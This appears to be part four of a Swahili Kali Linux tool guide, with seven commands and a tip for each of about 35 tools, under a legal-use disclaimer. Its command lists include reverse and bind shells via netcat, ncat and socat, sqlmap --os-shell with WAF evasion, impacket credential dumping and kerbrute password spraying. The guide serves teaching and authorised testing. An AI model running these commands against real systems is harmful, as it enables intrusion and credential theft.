Kali Linux & Ethical Hacking • Sehemu ya 4 (Tools 71-105)
MWONGOZO WA TOOLS ZA KALI LINUX (SEHEMU YA 4)
Mwongozo kamili wenye amri 7 mbadala, jinsi ya kufunga salama, jinsi ya kutumia, na troubleshooting kwa kila zana zote 175 bila kupunguzwa.
Tahadhari Muhimu ya Kisheria na Maadili (Code of Ethics)
Mwongozo huu umeandaliwa kwa madhumuni ya kielimu, ukaguzi wa kiusalama (Auditing), na ulinzi wa mifumo (Defensive Security). Kutumia zana hizi dhidi ya mitandao, mifumo, au vifaa bila kibali rasmi cha maandishi ni kosa la jinai chini ya Sheria ya Makosa ya Mtandao (Cybercrimes Act). Fanya majaribio kwenye maabara yako binafsi pekee (Virtual Machines/Local Lab).
Mada Mpya (2026 Trends)
MPYA 🔥AI Red Teaming, AD CS & WPA3.
MTK / SPD / Qualcomm
MULTI-CHIP ⚡MTKClient, SPD, EDL 9008 & Heimdall.
iPhone / iOS Lab
IOS libimobiledevice, DFU & Checkm8.
Super.bin & EROFS
EDITOR 🛠️Unpack, lpmake, EROFS & Bloatware.
Flash / SD Recovery
STORAGE 💾Fufua Flash, MicroSD na RAW Disks.
Find My Phone & SMS Divert Center
Mfumo mkuu wa kufuatilia simu iliyopotea (IMEI, GSMA & Live Satellite GPS), jenereta ya kodi za USSD Divert za mitandao yote ya simu, amri za Kali Linux, na ulinzi wa OTP dhidi ya udukuzi.
Ramani ya Eneo la Kifaa Hiki & Kipimo cha Umbali
Rada hii inafuatilia kifaa hiki unachotumia sasa kwa wakati huu halisi (Hardware, GPS Halisi, Betri, IP, ISP, na Anwani Kamili). Kila unachogusa au kufanya kinasomwa papo hapo kwenye logi za rada.
1. Kifaa hiki unachotumia sasa: Kinapata eneo halisi kupitia Satelaiti za GPS za simu/kompyuta yako unapobonyeza "Ruhusu / Allow GPS" au ukiandika mtaa wako kwenye kisanduku cha utafutaji hapa chini.
2. Simu Iliyoibiwa (IMEI): Hakuna tovuti duniani inayoweza kuona GPS ya simu ya mtu mwingine kwa kuandika namba ya IMEI pekee bila kuunganishwa na Google Find My Device (Android), Apple iCloud (iPhone), au mfumo wa Polisi/TCRA wa minara ya simu. Tumia vitufe vilivyopo hapa chini kufungua huduma rasmi.
📍 Inasubiri ruhusa na mawimbi ya GPS ya kifaa chako...
INASOMA MAWIMBI YA GPS HALISI YA KIFAA...
Mfumo unasubiri ruhusa na kusoma setilaiti za GPS za kifaa hiki bila kutumia makadirio ya IP.
Google Find My & iCloud Direct Gateway
REAL-TIME PORTALChagua mfumo wa simu yako na ubonyeze ili kuelekezwa moja kwa moja kuona kifaa chako kwenye ramani rasmi ya Google au Apple:
Unganisha Kifaa Moja kwa Moja na Find My Device / iCloud
Jaza taarifa za simu yako hapa chini, chagua mfumo (Android au Apple), kisha bofya kitufe kikuu cha kijani kuunganishwa moja kwa moja na kuona simu yako ilipo kwenye ramani rasmi.
Mwongozo wa Hatua 4 za Dharura Simu Yako Ikipotea
Amri ya Kurudisha Mtandao Kawaida (Cleanup Command)
Ukimaliza mazoezi yoyote ya kadi ya Wi-Fi/Monitor mode, andika amri hii kurejesha Wi-Fi:
sudo systemctl restart NetworkManagerMWONGOZO WA KINA: TOOLS NYINGINE 35 (SEHEMU YA NNE)
Amri 7 & Troubleshooting (1 - 35)SQLMAP (ADVANCED MODES)
sqlmap -u "http://example.com/page.php?id=1" --dbssqlmap -u "http://example.com/page.php?id=1" -D database_name --tablessqlmap -u "http://example.com/page.php?id=1" -T table_name --dumpsqlmap -r request.txt --batchsqlmap -u "http://example.com/page.php?id=1" --os-shellsqlmap --helpsqlmap -u "http://example.com/page.php?id=1" --tamper=space2commentBonyeza Ctrl + C
Kama tovuti inatumia WAF kali, tumia amri za --tamper na --random-agent ili kuzuia IP yako kuzuiwa.
XSSTRIKE
python3 xsstrike.py -u "http://example.com/search.php?q=query"python3 xsstrike.py --url "http://example.com/page.php" --crawlpython3 xsstrike.py -u "http://example.com/page.php?q=test" --blindpython3 xsstrike.py --helppython3 xsstrike.py -u "http://example.com/page.php?q=test" --fuzzerpython3 xsstrike.py -u "http://example.com/page.php?q=test" --file payloads.txtpython3 xsstrike.py --updateCtrl + C
Hakikisha maktaba zote za Python zinazohitajika (kama requests na bs4) zimesakinishwa.
DFF (DIGITAL FORENSIC FRAMEWORK)
dffsudo dffdff --helpdff -gpython3 -m dffdff --versionsudo dff --cliFunga dirisha la program au andika 'exit' kwenye CLI.
Inahitaji rasilimali za kutosha za RAM wakati wa kuchanganua picha kubwa za diski.
GIMPGHOST / GDB (GNU DEBUGGER)
gdb ./programgdb -q ./programgdb --helpgdb -p [PID]gdb -c core_dump ./programgdb -ex "run" ./programgdb -q --args ./program arg1 arg2Ndani ya gdb andika 'quit' kisha y
Ili kupata maelezo kamili ya makosa, hakikisha programu imekusanywa na alama za debugging (-g).
STRACE
strace ./programstrace -c ./programstrace -p [PID]strace -o output.txt ./programstrace -e trace=open,read,write ./programstrace -f ./programstrace --helpCtrl + C
Inaweza kutoa maandishi mengi sana kwa mpigo; tumia bendera ya -o kuhifadhi kwenye faili.
LTRACE
ltrace ./programltrace -c ./programltrace -p [PID]ltrace -o ltrace_out.txt ./programltrace -S ./programltrace --helpltrace -e strcmp,printf ./programCtrl + C
Inafanya kazi vizuri zaidi kwenye programu zilizokusanywa kwa mfumo wa ELF wa Linux.
NETCAT (NC) - THE SWISS ARMY KNIFE
nc -lvp 4444nc 192.168.1.50 4444nc -z -v 192.168.1.1 1-1000nc -lvp 4444 -e /bin/bashnc -u -lvp 53nc --helpnc -w 3 192.168.1.1 80Ctrl + C
Kwenye matoleo mapya ya Kali Linux, bendera ya -e mara nyingi imefungwa kwa sababu za kiusalama; tumia ncat au bash nyingine badala yake.
NCAT (NMAP NETCAT)
ncat -lvp 4444ncat 192.168.1.50 4444ncat --ssl -lvp 4444ncat --helpncat -v -z 192.168.1.1 20-80ncat --allow 192.168.1.100 -lvp 4444ncat -e /bin/bash 192.168.1.50 4444Ctrl + C
Ncat ina sifa nzuri ya kuunga mkono usimbaji fiche wa SSL moja kwa moja.
SOCAT
socat TCP-LISTEN:4444,fork TCP:192.168.1.50:80socat FILE:input.txt,creat TCP:192.168.1.50:4444socat -hsocat TCP-LISTEN:4444 EXEC:/bin/bashsocat OPENSSL-LISTEN:4444,cert=cert.pem,verify=0 -socat -v TCP-LISTEN:4444,fork TCP:example.com:80socat UDP-LISTEN:53,fork UDP:8.8.8.8:53Ctrl + C
Sintaksia ya socat inaweza kuwa ngumu kidogo mwanzoni; hakikisha unaangalia mwongozo kwa kutumia -h.
SSH (PORT FORWARDING & TUNNELING)
ssh user@192.168.1.1ssh -L 8080:127.0.0.1:80 user@remote_ipssh -R 9090:127.0.0.1:8080 user@remote_ipssh -D 1080 user@remote_ipssh -i key.pem user@remote_ipssh -v user@remote_ipssh -N -f -L 3306:localhost:3306 user@remote_ipAndika 'exit' kisha Enter
Hakikisha ruhusa za faili la ufunguo (private key) ziko sahihi (chmod 600 key.pem).
SCP / RSYNC
scp local_file.txt user@192.168.1.50:/home/user/scp -r /home/user/folder user@192.168.1.50:/tmp/scp user@192.168.1.50:/var/log/syslog .rsync -avz /local/dir user@192.168.1.50:/remote/dirscp -P 2222 file.txt user@192.168.1.50:/tmp/rsync -P --progress file.iso user@192.168.1.50:/tmp/scp --helpInajifunga yenyewe ikimaliza
Hakikisha huduma ya SSH inafanya kazi kwenye kompyuta unayotuma au kuchukua faili.
FTP / TFTP (CLI CLIENTS)
ftp 192.168.1.50tftp 192.168.1.50ftp -hlftp user@192.168.1.50echo -e "get file.txt\nbye" | ftp 192.168.1.50tftp 192.168.1.50 -c get remote_file.binftp -v -n 192.168.1.50Ndani ya ftp andika 'bye' au 'quit'
FTP ya kawaida haisimbui data; kila kitu kinapita kwa maandishi wazi (plaintext).
SMBCLIENT
smbclient -L //192.168.1.50smbclient //192.168.1.50/share_namesmbclient -U username //192.168.1.50/sharesmbclient --helpsmbclient -N //192.168.1.50/publicsmbclient -U "%" //192.168.1.50/sharesmbclient //192.168.1.50/share -c "ls; dir"Ndani ya smbclient andika 'exit'
Mifumo ya kisasa ya Windows mara nyingi huzuia toleo la zamani la SMBv1; hakikisha unatumia SMBv2 au SMBv3.
SMBMAP
smbmap -H 192.168.1.50smbmap -H 192.168.1.50 -u username -p passwordsmbmap -H 192.168.1.50 -d WORKGROUP -u user -p pass --sharessmbmap --helpsmbmap -H 192.168.1.50 -R share_namesmbmap -H 192.168.1.50 --download "share_name/file.txt"smbmap -H 192.168.1.50 --upload "/tmp/local.txt" "share/remote.txt"Inajifunga yenyewe
Ni chombo chenye ufanisi mkubwa kuliko smbclient kwa ajili ya kufanya ukaguzi wa haraka wa mtandao.
ENUM4LINUX
enum4linux 192.168.1.50enum4linux -a 192.168.1.50enum4linux -U 192.168.1.50enum4linux -S 192.168.1.50enum4linux --helpenum4linux -P 192.168.1.50enum4linux -u admin -p password 192.168.1.50Inajifunga yenyewe au Ctrl + C
Inachukua muda kidogo kukamilisha uchunguzi wote; subiri hadi itakapotoa ripoti kamili.
SNMPWALK / SNMP-CHECK
snmpwalk -v 2c -c public 192.168.1.1snmpwalk -v 1 -c public 192.168.1.1 1.3.6.1.2.1.1snmp-check 192.168.1.1snmpwalk --helpsnmpwalk -v 2c -c private 192.168.1.1snmp-check 192.168.1.1 -c public -p 161nmap -sU --script snmp-brute 192.168.1.1Inajifunga yenyewe
Vifaa vingi vinatumia neno la kawaida la public kama read-only community string kwa chaguomsingi.
ONCRPC / RPCRC TOOLS (RPCINFO)
rpcinfo -p 192.168.1.50rpcinfo -s 192.168.1.50rpcinfo --helprpcinfo -T tcp 192.168.1.50 nfsshowmount -e 192.168.1.50nmap -sV -p 111 --script=rpcinfo 192.168.1.50rpcinfo -u 192.168.1.50 100000Inajifunga yenyewe
Port 111 (rpcbind) lazima iwe wazi ili amri hizi ziweze kuwasiliana na seva.
SHOWMOUNT
showmount -e 192.168.1.50showmount -a 192.168.1.50showmount -d 192.168.1.50showmount --helpmount -t nfs 192.168.1.50:/share /mnt/nfsshowmount -hnmap --script nfs-ls,nfs-statfs 192.168.1.50Inajifunga yenyewe
Kama huduma ya NFS haijasakinishwa au imefungwa kwenye firewall, amri hii haitaleta matokeo.
LDAPSEARCH
ldapsearch -x -H ldap://192.168.1.50 -b "dc=example,dc=com"ldapsearch -x -h 192.168.1.50 -s base namingContextsldapsearch --helpldapsearch -x -H ldap://192.168.1.50 -D "cn=admin,dc=example,dc=com" -w password -b "dc=example,dc=com"nmap -p 389 --script ldap-search 192.168.1.50ldapsearch -x -h 192.168.1.50 "(objectClass=person)"ldapsearch -x -H ldaps://192.168.1.50 -b "dc=example,dc=com"Inajifunga yenyewe
Bandari ya LDAP kwa kawaida ni 389 kwa zisizosimbwa na 636 kwa LDAPS (TLS).
IMPACKET TOOLS (SECRETSDUMP / SMBEXEC / WMIEXEC)
python3 secretsdump.py domain/user:password@192.168.1.50python3 wmiexec.py domain/user:password@192.168.1.50python3 smbexec.py domain/user:password@192.168.1.50python3 psexec.py domain/user:password@192.168.1.50python3 GetNPUsers.py domain/ -no-pass -usersfile users.txtpython3 rpcdump.py 192.168.1.50python3 aattacks.py --helpCtrl + C
Impacket inahitaji Python na maktaba zake kusakinishwa kwa usahihi (pip install impacket).
BLOODHOUND-PYTHON / BLOODHOUND
bloodhound-python -u username -p password -d domain.local -c All -ns 192.168.1.50bloodhound-python -u username --secure --collectors Group,User,Computer -d domain.local -dc dc.domain.localbloodhoundbloodhound-python --helpneo4j consolebloodhound-python -u username -p password -d domain.local -c ACL,Trustspython3 bloodhound.py --helpFunga GUI au andika Ctrl + C kwenye terminal.
BloodHound inahitaji hifadhidata ya Neo4j kufanya kazi vizuri kwenye mwonekano wa picha (GUI).
KERBRUTE
kerbrute userenum -d domain.local --dc 192.168.1.50 users.txtkerbrute passwordspray -d domain.local --dc 192.168.1.50 users.txt Password123kerbrute bruteforce -d domain.local --dc 192.168.1.50 passwords.txt usernamekerbrute --help./kerbrute_linux_amd64 userenum -d example.com --dc 192.168.1.50 usernames.txtkerbrute bruteforce --dc 192.168.1.50 -d domain.local passwords.txt adminkerbrute versionInajifunga yenyewe ikimaliza
Kerbrute inafanya kazi kwa kasi kubwa kwa sababu haizalishi logi nyingi kwenye Active Directory ukilinganisha na zana za kawaida.
HASHCAT (ADVANCED MODES & RULES)
hashcat -m 0 -a 0 hash.txt wordlist.txthashcat -m 1000 -a 0 ntlm_hash.txt wordlist.txthashcat -m 22000 -a 0 handshake.hc22000 wordlist.txthashcat -m 0 -a 3 hash.txt ?l?l?l?l?l?lhashcat --show hash.txthashcat --helphashcat -m 1800 -a 0 sha512crypt_hash.txt wordlist.txt -r rules/best64.ruleBonyeza herufi q kwenye kibodi au Ctrl + C
Kama unaendesha kwenye Linux na unapata hitilafu ya OpenCL, hakikisha viendeshi (drivers) vya kadi yako ya picha vimesakinishwa vizuri.
JOHN THE RIPPER (ADVANCED)
john hash.txtjohn --wordlist=wordlist.txt hash.txtjohn --show hash.txtjohn --format=NT hash.txtjohn --rules hash.txtjohn --helpjohn --restore=1Bonyeza kitufe chochote au Ctrl + C
John hutambua aina ya hash yenyewe kwa urahisi, lakini unaweza kulazimisha kwa bendera ya --format kama itahitajika.
CUPP (COMMON USER PASSWORDS PROFILER)
python3 cupp.py -ipython3 cupp.py -w target_info.txtpython3 cupp.py -lpython3 cupp.py -hpython3 cupp.py -apython3 cupp.py -c filename.txtpython3 cupp.py --helpInajifunga yenyewe ikimaliza
Ni nzuri sana wakati wa Social Engineering pale unapofahamu baadhi ya maelezo ya mlengwa.
CEWL (CUSTOM WORD LIST GENERATOR)
cewl http://example.com -w wordlist.txtcewl http://example.com -d 3 -m 5 -w words.txtcewl --helpcewl -e -d 2 http://example.com -w emails.txtcewl -a http://example.com -w words_with_meta.txtcewl -u "UserAgentString" http://example.com -w out.txtcewl --meta http://example.comInajifunga yenyewe
Tovuti inatakiwa iwe wazi na iweze kufikiwa kupitia mtandao ili iweze kuchambuliwa.
RATS / Flawfinder
flawfinder /path/to/source/code/rats -w 3 /path/to/code/flawfinder --csv /path/to/code/ > report.csvflawfinder --helprats --helpflawfinder --minlevel=3 /path/to/code/flawfinder -S /path/to/code/Inajifunga yenyewe ikimaliza
Inafaa sana kwa wachambuzi wa msimbo wa C, C++, Python, na lugha nyingine za programu.
SEMGREP / SONARQUBE (CLI)
semgrep --config=autosemgrep --config p/security-auditsemgrep --helpsemgrep --json --output=report.jsonsemgrep --config=p/cisemgrep scan --config auto /path/to/projectsemgrep --versionInajifunga yenyewe
Semgrep ni ya kisasa sana na inaunga mkono lugha nyingi za programu kama JavaScript, Python, Go, na Java.
RETDEC
retdec-decompiler.py binary_fileretdec-decompiler.py --helpretdec-decompiler.py -o output.c binary_fileretdec-decompiler.py --cleanup binary_fileretdec-decompiler.py --select-functions main,auth binary_fileretdec-decompiler.py --backend-decompilation-timeout 300 binary_fileretdec-decompiler.py --versionInajifunga yenyewe
Inasaidia sana kwenye masuala ya Reverse Engineering ya faili za binary za ELF au PE.
RADARE2 / R2
r2 ./binaryr2 -A ./binaryradare2 -d ./binaryr2 -hr2 -w ./binaryr2 -q -c "aaa; pdf @ main" ./binaryr2pm -hNdani ya radare2 andika 'q' au 'quit'
Radare2 ina amri nyingi sana; tumia amri ya ? ndani ya r2 kuona msaada wa kila hatua.
GHIDRA (CLI / HEADLESS MODE)
analyzeHeadless /tmp/project_dir my_project -import binary_fileghidraRunanalyzeHeadless --helpanalyzeHeadless /tmp/proj proj -import file.exe -postScript MyScript.py./ghidraRunanalyzeHeadless /tmp/proj proj -import file.elf -processor x86:LE:64:defaultjava -jar ghidra.jarFunga dirisha la GUI au Ctrl + C kwenye headless mode.
Ghidra inahitaji Java JDK iliyowekwa vizuri kwenye mfumo wako ili iweze kuwaka bila makosa.
APKTOOL
apktool d app.apkapktool b decoded_folderapktool --helpapktool d -f app.apkapktool b decoded_folder -o new_app.apkapktool if framework.apkapktool --versionInajifunga yenyewe
Baada ya kusanya tena APK, utahitaji kuweka saini (sign) kwenye faili jipya kabla ya kuliweka kwenye simu.
JADX / JADX-GUI
jadx-guijadx app.apk -d out_folderjadx --helpjadx -e app.apkjadx -d src_out app.apkjadx --no-debug app.apkjadx --versionFunga dirisha la program au Ctrl + C
Jadx-gui inatoa muonekano mzuri sana wa picha kwa ajili ya kuchunguza mantiki ya ndani ya programu za Android.
FRIDA / FRIDA-PS
frida-ps -Ufrida -U -f com.example.app -l script.jsfrida-trace -U -i "java.*" com.example.appfrida --helppip install frida-toolsfrida-ps -Rfrida --versionCtrl + C
Frida server inatakiwa iwe inafanya kazi ndani ya simu (kupitia adb) kwa usahihi ili kuunganishwa.
MOBSF (MOBILE SECURITY FRAMEWORK)
mobsfpython3 manage.py runserver 0.0.0.0:8000./run.shdocker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsfpython3 manage.py --helpmobsf --helpdocker pull opensecurity/mobile-security-framework-mobsfCtrl + C au funga kivinjari na kusimamisha seva ya Docker/Python.
Kutumia kupitia Docker ndiyo njia rahisi na safi zaidi ya kuepusha changamoto za maktaba zinazokosekana kwenye mfumo wako.
